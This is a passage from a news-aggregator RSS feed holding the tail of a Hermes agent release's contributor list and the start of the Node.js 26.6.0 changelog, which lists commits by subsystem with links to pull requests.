@jeff-mettel, @JeffStone69, @JeliTron, @jethac, @jfmusa2024-cyber, @Jiahui-Gu, @jinglun010-cpu, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>,<br>
@joelbrilliant, @John-Lussier, @johnkattenhorn, @Johnny-xuan, @johnnykor82, @joncaldwell90, @JonthanaHanh,<br>
@jordanhubbard, @JorkeyLiu, @jquesnelle, @jrfbch, @juanmartitegui, @Julientalbot, @juniperbevensee, @justemu,<br>
@kael-odin, @kaishi00, @kaiyisg, @kamonspecial, @kandotrun, @KCAYAAI, @keepConcentration, @kelsia14, @Kenmege,<br>
@kerpopule, @Kev-fs, @Kewe63, @kharitonov-ivan, @Kingdomwarrior23, @kingrubic, @Kinkoolino-Hermes, @kjames2001,<br>
@knoal, @kohoj, @Kolektori, @konsisumer, @koshaji, @kronexoi, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, @kuangmi-bit, @kudi88, @kylezh,<br>
@kyssta-exe, @Kyzcreig, @lanyusea, @LauraGPT, @LavyaTandel, @LeonSGP43, @leoprodz, @LevSky22, @lEWFkRAD,<br>
@lewis4x4, @lexgenius, @LFDMcore, @LiangYang666, @lidises, @light-merlin-dark, @lihengming, @Linux2010,<br>
@LionGateOS, @liuhao1024, @liusencomic-cyber, @ljsdut, @lkevincc0, @LLQWQ, @locker95, @logical-and,<br>
@LordNikon1983, @lost9999, @Love-JourneY, @LunarNexus, @luxiaolu4827, @lxman, @m4r13y, @MaartenDMT,<br>
@MacroAnarchy, @maff-t2b, @MahdiHedhli, @mahdiwafy, @malaiwah, @mannnrachman, @mapu-og, @markoub, @matarbot,<br>
@materemias, @matt-strawbridge, @mattezell, @MattMaximo, @mattmillerai, @mattshapsss, @MaxFreedomPollard,<br>
@maxmilian, @McHermes, @mehmetkr-31, @menhguin, @metamon-p, @mijanx, @MLcogTech, @moeadham, @mollusk,<br>
@monerostar, @MorAlekss, @morolab, @motoblurr, @MrAbsaroka, @mrzlab630, @ms-alan, @muctobi, @MustafaK99,<br>
@mwbrooks, @myk0la-b, @mzkarami, @namredips, @nanami7777777, @nanckh, @natebransc, @nateEc, @navahc09,<br>
@Ne0teric, @necoweb3, @nftpoetrist, @nickkarhan, @Ninso112, @nkreadly07, @nnnet, @NPFernando, @nrmjeremy,<br>
@nu476, @null-runner, @nullptr0807, @NYTEMODEONLY, @obelisk-complex, @OfficialDelta, @okalentiev,<br>
@oliviaaaa7788, @OmarB97, @omid3098, @ooiuuii, @oppenheimor, @oreoluwa, @ousiaresearch, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>,<br>
@panDing19, @paralegalia, @patp, @PavelTajdus, @peacockesq, @Pebrd, @peterw, @phantom-instruction-set,<br>
@pierrenode, @PINKIIILQWQ, @piyushbag, @plainOldCode, @pnascimento9596, @pooyan6, @pprism13, @praneshnikhar,<br>
@PRATHAMESH75, @Prontsevich, @quantumbyte1617, @QuarkAssistant, @Que0x, @Qwinty, @rayjerrywoo, @rayjun,<br>
@Reaper-Forge, @RedClaus, @redsol-llc, @reinbeumer, @RelaxJonh, @RemyFevry, @replygirl, @rerdi92, @rhylryan21,<br>
@RichardHojunJang, @richkapp, @rkfshakti, @rlaope, @rob-coco, @rob-maron, @robbyczgw-cla, @robgfl45,<br>
@robzolkos, @rod-nxtlevel, @rodboev, @Roger--Han, @rsayar, @rudironsoni, @ruizanthony, @rungmc357, @s00rz,<br>
@s905060, @Sahil-SS9, @sakhnenkoff, @salimhamed, @samrusani, @sbe27, @ScaleLeanChris, @schattenan, @sealca,<br>
@seamusmore, @sebaorrego-koronet, @seppegadeyne, @sergioperezcheco, @sethmills21, @sg-shag, @sgtworkman,<br>
@shady2k, @shannonsands, @shellybotmoyer, @sherman-yang, @shivasymbl, @Shizoqua, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @simonmmafs,<br>
@skyer-flyyy, @Skywind5487, @sl4m3, @Slopez2023, @SmallNew2003, @smfworks, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Soju06/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Soju06">@Soju06</a>, @Solitud1nem,<br>
@solyanviktor-star, @somewheresy, @Sora-bluesky, @sowork-skills, @soynchux, @sparkeros, @spfcraze,<br>
@spiky02plateau, @spro-work, @SquabbyZ, @srojk34, @StanleyStetson, @StartupBros-com, @StellarisW,<br>
@stephenschoettler, @Stoltemberg, @stremtec, @Studio729, @stwith, @subhoya, @sunwz1115, @suparious,<br>
@supplefrog, @sycamoregroupltd, @szzhoujiarui, @tachyon-r, @Tamaz-sujashvili, @tandixit95, @tank321, @tavva,<br>
@tcconnally, @temalo, @th3wingman, @the3asic, @TheAngryPit, @TheEpTic, @theone139344, @TheSmokeDev,<br>
@thirstycrow, @tianma-if, @Tianworld, @tinetwork, @to-na, @tom-channel, @tomqiaozc, @toomij99, @trac3r00,<br>
@Tranquil-Flow, @Trantor-develops, @trevorgordon981, @trevornk, @trippyogi, @trymhaak, @tsuk1nose, @tusharui,<br>
@TutkuEroglu, @tw0316, @twe-cloud, @tymrtn, @UltraInstinct0x, @umi008, @unixwzrd, @upicat, @vaibhavjnf, @valda,<br>
@Vansh5632, @Variable85, @vb3, @VerbalChainsaw, @vexclawx31, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/victor-kyriazakos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/victor-kyriazakos">@victor-kyriazakos</a>, @vigilancetech-com,<br>
@virtuadex, @Vissirexa, @VittoriaLanzo, @VIVAAN-DHAWAN, @wangyunyou, @waroffchange, @wayne1992127, @web3blind,<br>
@webtecnica, @WeiYusc, @wen0531, @wernerhp, @wesleysimplicio, @westkite1201, @wgd753, @wgu9,<br>
@wjj1872744570-source, @wjq990112, @WojtekMR3, @WOLIKIMCHENG, @Wpnx330, @wreed4, @wuli666, @WXBR, @wz-heng,<br>
@x7peeps, @xcompass, @xd-Neji, @xenodmc, @Xipong, @xrazai, @Xue-1997, @xxxigm, @y0shua1ee, @yaleman,<br>
@yemi-lagosinternationalmarket, @ygd58, @yingliang-zhang, @yinkev, @yitang, @YLChen-007, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yoniebans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yoniebans">@yoniebans</a>,<br>
@youzi-1122, @ypwcharles, @yuexiongHNU, @yungchentang, @yuzilongleif-collab, @yyzquwu, @z23, @ZachariahChu,<br>
@zakhounet, @zapabob, @Zavianx, @zehuaw1, @zengzheqing, @Zeraphim, @zgzczzw, @zhangyang-crazy-one,<br>
@Zhekinmaksim, @Zioywishing, @zmlgit, @zombopanda, @ZundamonnoVRChatkaisetu<br>
Also: @kyssta-exe 25470058+kyssta-exe.</p>
<p>Thank you to every one of the 647 people who contributed code, co-authored fixes, filed the ~1,200 issues this release closes, and had their PRs salvaged into main. Hermes ships this fast because of you.</p>

<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.7.20...v2026.8.3">v2026.7.20...v2026.8.3</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: 2026-08-03, Version 26.6.0 (Current), @aduh95]]></title>
<description><![CDATA[Notable Changes

[5a36018abc] - doc: add MikeMcC399 as collaborator (Mike McCready) #64656
[9b04f82d7b] - (SEMVER-MINOR) ffi: add getCurrentEventLoop (Paolo Insogna) #64323
[bb51f2c960] - (SEMVER-MINOR) test_runner: add context.log() and test:log event (Moshe Atlow) #64389
[56ce83b3ee] - (SEMVER-...]]></description>
<link>https://tsecurity.de/de/3701498/downloads/github-2026-08-03-version-2660-current-aduh95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701498/downloads/github-2026-08-03-version-2660-current-aduh95/</guid>
<pubDate>Mon, 03 Aug 2026 20:21:51 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h3>Notable Changes</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/5a36018abc"><code>5a36018abc</code></a>] - <strong>doc</strong>: add MikeMcC399 as collaborator (Mike McCready) <a href="https://github.com/nodejs/node/pull/64656" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64656/hovercard">#64656</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b04f82d7b"><code>9b04f82d7b</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>ffi</strong>: add <code>getCurrentEventLoop</code> (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/64323" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64323/hovercard">#64323</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb51f2c960"><code>bb51f2c960</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>test_runner</strong>: add <code>context.log()</code> and <code>test:log</code> event (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/64389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64389/hovercard">#64389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/56ce83b3ee"><code>56ce83b3ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>test_runner</strong>: report <code>entryFile</code> in <code>TestStream</code> events (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/64309" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64309/hovercard">#64309</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/248ff9fa5c"><code>248ff9fa5c</code></a>] - <strong>assert,util</strong>: fix TypeError on Maps with null keys (Paul Bouchon) <a href="https://github.com/nodejs/node/pull/64441" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64441/hovercard">#64441</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b5baceafe"><code>3b5baceafe</code></a>] - <strong>benchmark</strong>: add bytes variant to webstreams async-iterator (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64291" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64291/hovercard">#64291</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0a46d1ef66"><code>0a46d1ef66</code></a>] - <strong>buffer</strong>: normalize lone "\r" in Blob native line endings (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/64115" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64115/hovercard">#64115</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d9ada18b70"><code>d9ada18b70</code></a>] - <strong>buffer</strong>: fix Blob.stream() leaking source buffer (semimikoh) <a href="https://github.com/nodejs/node/pull/63577" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63577/hovercard">#63577</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d05993bcf6"><code>d05993bcf6</code></a>] - <strong>build</strong>: merge multiple on download artifact (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64633" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64633/hovercard">#64633</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6c25ac909a"><code>6c25ac909a</code></a>] - <strong>build</strong>: extract temporal_capi crate directory name into gyp variable (René) <a href="https://github.com/nodejs/node/pull/64482" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64482/hovercard">#64482</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/612f60c300"><code>612f60c300</code></a>] - <strong>cli</strong>: style node --help output with util.styleText (Adrián Estrada) <a href="https://github.com/nodejs/node/pull/64484" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64484/hovercard">#64484</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/29a938ddbb"><code>29a938ddbb</code></a>] - <strong>crypto</strong>: preserve RSA-PSS legacy pubkey DER (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64547" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64547/hovercard">#64547</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2fde794357"><code>2fde794357</code></a>] - <strong>crypto</strong>: cleanse provider private key copies (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64547" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64547/hovercard">#64547</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/33a0e08d41"><code>33a0e08d41</code></a>] - <strong>crypto</strong>: handle incomplete RSA private keys (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64547" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64547/hovercard">#64547</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11b4d505ef"><code>11b4d505ef</code></a>] - <strong>crypto</strong>: retain legacy DH validation (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64547" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64547/hovercard">#64547</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6e302041e1"><code>6e302041e1</code></a>] - <strong>crypto</strong>: limit KangarooTwelveParams customization to 512 bytes (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64557" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64557/hovercard">#64557</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/195f103e87"><code>195f103e87</code></a>] - <strong>crypto</strong>: split OpenSSL 3, BoringSSL, and legacy backends (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64211" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64211/hovercard">#64211</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ec67e24eee"><code>ec67e24eee</code></a>] - <strong>deps</strong>: update googletest to fa005b296f90faec4f352d7ab382287bf6548c8d (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64587" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64587/hovercard">#64587</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/32ffff88fd"><code>32ffff88fd</code></a>] - <strong>deps</strong>: histogram: cherry-pick 62ea52b07ee9b195 (StefanStojanovic) <a href="https://github.com/nodejs/node/pull/64296" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64296/hovercard">#64296</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e0664f1f09"><code>e0664f1f09</code></a>] - <strong>deps</strong>: update histogram to 0.11.10 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64296" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64296/hovercard">#64296</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cf0622bdd6"><code>cf0622bdd6</code></a>] - <strong>deps</strong>: update amaro to 1.1.11 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64586" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64586/hovercard">#64586</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/04c78b8b24"><code>04c78b8b24</code></a>] - <strong>deps</strong>: update timezone to 2026c (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64588" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64588/hovercard">#64588</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/59f4318976"><code>59f4318976</code></a>] - <strong>deps</strong>: V8: cherry-pick 1158ae719749 (René) <a href="https://github.com/nodejs/node/pull/64432" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64432/hovercard">#64432</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e5ea7cd299"><code>e5ea7cd299</code></a>] - <strong>deps</strong>: update googletest to 8240fa7d62f73e01c7af27d61ed965d6d66698fa (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64439" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64439/hovercard">#64439</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0e7554cee4"><code>0e7554cee4</code></a>] - <strong>deps</strong>: update libffi to 3.7.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64438" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64438/hovercard">#64438</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/46c9d724ad"><code>46c9d724ad</code></a>] - <strong>deps</strong>: update ngtcp2 to 1.24.0 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64297" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64297/hovercard">#64297</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3519aac9af"><code>3519aac9af</code></a>] - <strong>deps</strong>: enable OpenSSL asm support for riscv64 (Jamie Magee) <a href="https://github.com/nodejs/node/pull/62606" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62606/hovercard">#62606</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c09701218b"><code>c09701218b</code></a>] - <strong>deps</strong>: update c-ares to 1.34.8 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64330" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64330/hovercard">#64330</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ad2f3bc95b"><code>ad2f3bc95b</code></a>] - <strong>deps</strong>: upgrade npm to 11.18.0 (npm team) <a href="https://github.com/nodejs/node/pull/64199" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64199/hovercard">#64199</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d7a4b22c86"><code>d7a4b22c86</code></a>] - <strong>deps</strong>: V8: backport a05321ebd98e (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64202" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64202/hovercard">#64202</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8679cff291"><code>8679cff291</code></a>] - <strong>deps</strong>: update zlib to 1.3.2.1-motley-8b3aa8a (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64295" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64295/hovercard">#64295</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df5b1e10ba"><code>df5b1e10ba</code></a>] - <strong>doc</strong>: remove unsupported syntax from <code>stream_iter.md</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64649" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64649/hovercard">#64649</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a4ca9083f"><code>8a4ca9083f</code></a>] - <strong>doc</strong>: clarify rules for adding new built-in modules (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64648" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64648/hovercard">#64648</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d50fe6b7a"><code>7d50fe6b7a</code></a>] - <strong>doc</strong>: mention DEPENDENCY custom field for H1 reports (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/64634" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64634/hovercard">#64634</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8f415bf5fc"><code>8f415bf5fc</code></a>] - <strong>doc</strong>: fix dnsPromises.lookup verbatim default (Shivam S) <a href="https://github.com/nodejs/node/pull/64658" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64658/hovercard">#64658</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c6378f724d"><code>c6378f724d</code></a>] - <strong>doc</strong>: fix broken links and clean up type map (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64625" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64625/hovercard">#64625</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b53ec19a2"><code>9b53ec19a2</code></a>] - <strong>doc</strong>: fix typo in releases guide (Jihwan) <a href="https://github.com/nodejs/node/pull/64621" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64621/hovercard">#64621</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5a36018abc"><code>5a36018abc</code></a>] - <strong>doc</strong>: add MikeMcC399 as collaborator (Mike McCready) <a href="https://github.com/nodejs/node/pull/64656" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64656/hovercard">#64656</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d2c8acd764"><code>d2c8acd764</code></a>] - <strong>doc</strong>: use promote wording in release guide (Md Muhtasim Munif Fahim) <a href="https://github.com/nodejs/node/pull/64371" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64371/hovercard">#64371</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5c692cb576"><code>5c692cb576</code></a>] - <strong>doc</strong>: fix import.meta example for vm.SourceTextModule (Muhammad Zeeshan) <a href="https://github.com/nodejs/node/pull/64112" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64112/hovercard">#64112</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7568ce71ca"><code>7568ce71ca</code></a>] - <strong>doc</strong>: mention crypto.hash() for better perf (Steven) <a href="https://github.com/nodejs/node/pull/63420" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63420/hovercard">#63420</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cf3f631936"><code>cf3f631936</code></a>] - <strong>doc</strong>: update sea example by fixing wrong code example (Maxence Robinet) <a href="https://github.com/nodejs/node/pull/64025" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64025/hovercard">#64025</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce21e567a4"><code>ce21e567a4</code></a>] - <strong>doc</strong>: fix socket.readyState state descriptions (YuSheng Chen) <a href="https://github.com/nodejs/node/pull/64468" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64468/hovercard">#64468</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/018c7f1c01"><code>018c7f1c01</code></a>] - <strong>doc</strong>: replace large tables in crypto.md and webcrypto.md with lists (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64582" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64582/hovercard">#64582</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cf82de8d8b"><code>cf82de8d8b</code></a>] - <strong>doc</strong>: note --env-file is not applied to --run (Paul Bouchon) <a href="https://github.com/nodejs/node/pull/64442" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64442/hovercard">#64442</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e635ce5201"><code>e635ce5201</code></a>] - <strong>doc</strong>: fix typo in embedding.md (greenhead) <a href="https://github.com/nodejs/node/pull/64425" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64425/hovercard">#64425</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b1f6eda3f"><code>0b1f6eda3f</code></a>] - <strong>doc</strong>: fix typos in contributing docs (Donghoon Kang) <a href="https://github.com/nodejs/node/pull/64520" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64520/hovercard">#64520</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d978ce80ef"><code>d978ce80ef</code></a>] - <strong>doc</strong>: document TLS alpnProtocol and servername fields (Tim Perry) <a href="https://github.com/nodejs/node/pull/64362" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64362/hovercard">#64362</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/394669e3b3"><code>394669e3b3</code></a>] - <strong>doc</strong>: fix spelling in devcontainer guide (한만욱) <a href="https://github.com/nodejs/node/pull/64459" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64459/hovercard">#64459</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9786a593ea"><code>9786a593ea</code></a>] - <strong>doc</strong>: clarify PEM format for signing keys (Harjoth Khara) <a href="https://github.com/nodejs/node/pull/64404" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64404/hovercard">#64404</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6251f832ba"><code>6251f832ba</code></a>] - <strong>doc</strong>: fix typo in tls.md (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64458/hovercard">#64458</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b8656c40ad"><code>b8656c40ad</code></a>] - <strong>doc</strong>: document net Socket server property (Efe Karasakal) <a href="https://github.com/nodejs/node/pull/64364" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64364/hovercard">#64364</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/03e9c738f3"><code>03e9c738f3</code></a>] - <strong>doc</strong>: update a Dispatcher undici doc link (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64358" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64358/hovercard">#64358</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b6dd2debf0"><code>b6dd2debf0</code></a>] - <strong>doc</strong>: fix typos in documentation (Jungwon Sohn) <a href="https://github.com/nodejs/node/pull/64466" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64466/hovercard">#64466</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b7d778c3c"><code>3b7d778c3c</code></a>] - <strong>doc</strong>: clarify fixes and refs trailer guidance (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64421" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64421/hovercard">#64421</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/eb086a6e03"><code>eb086a6e03</code></a>] - <strong>doc</strong>: remove duplicate VirtualProvider description (Archkon) <a href="https://github.com/nodejs/node/pull/64400" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64400/hovercard">#64400</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bc221a8cd7"><code>bc221a8cd7</code></a>] - <strong>doc</strong>: add scope overview tables for TestsStream events (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/64386" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64386/hovercard">#64386</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b3dbd36df"><code>4b3dbd36df</code></a>] - <strong>doc</strong>: clarify proxy threat model (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64366" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64366/hovercard">#64366</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c5526f69d6"><code>c5526f69d6</code></a>] - <strong>doc</strong>: add note about restricted CI to pull-requests.md (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/64321" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64321/hovercard">#64321</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/968eaf6538"><code>968eaf6538</code></a>] - <strong>doc</strong>: various updates to releases.md (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/64198" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64198/hovercard">#64198</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2a51f8ba8e"><code>2a51f8ba8e</code></a>] - <strong>doc</strong>: remove obsolete --napi-modules doc entry (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64220" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64220/hovercard">#64220</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee5a54535e"><code>ee5a54535e</code></a>] - <strong>doc,test</strong>: widen fsPromises.appendFile()'s data type, add missing tests (Jimmy Leung) <a href="https://github.com/nodejs/node/pull/64279" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64279/hovercard">#64279</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b923df86fc"><code>b923df86fc</code></a>] - <strong>events</strong>: avoid retaining removed event names (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64475" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64475/hovercard">#64475</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d8d413ff5"><code>7d8d413ff5</code></a>] - <strong>events</strong>: optimize once() and removeListener() (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64373" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64373/hovercard">#64373</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f2f8881d2a"><code>f2f8881d2a</code></a>] - <strong>ffi</strong>: evaluate function signatures once (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64559" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64559/hovercard">#64559</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b04f82d7b"><code>9b04f82d7b</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>ffi</strong>: add getCurrentEventLoop (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/64323" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64323/hovercard">#64323</a></li>
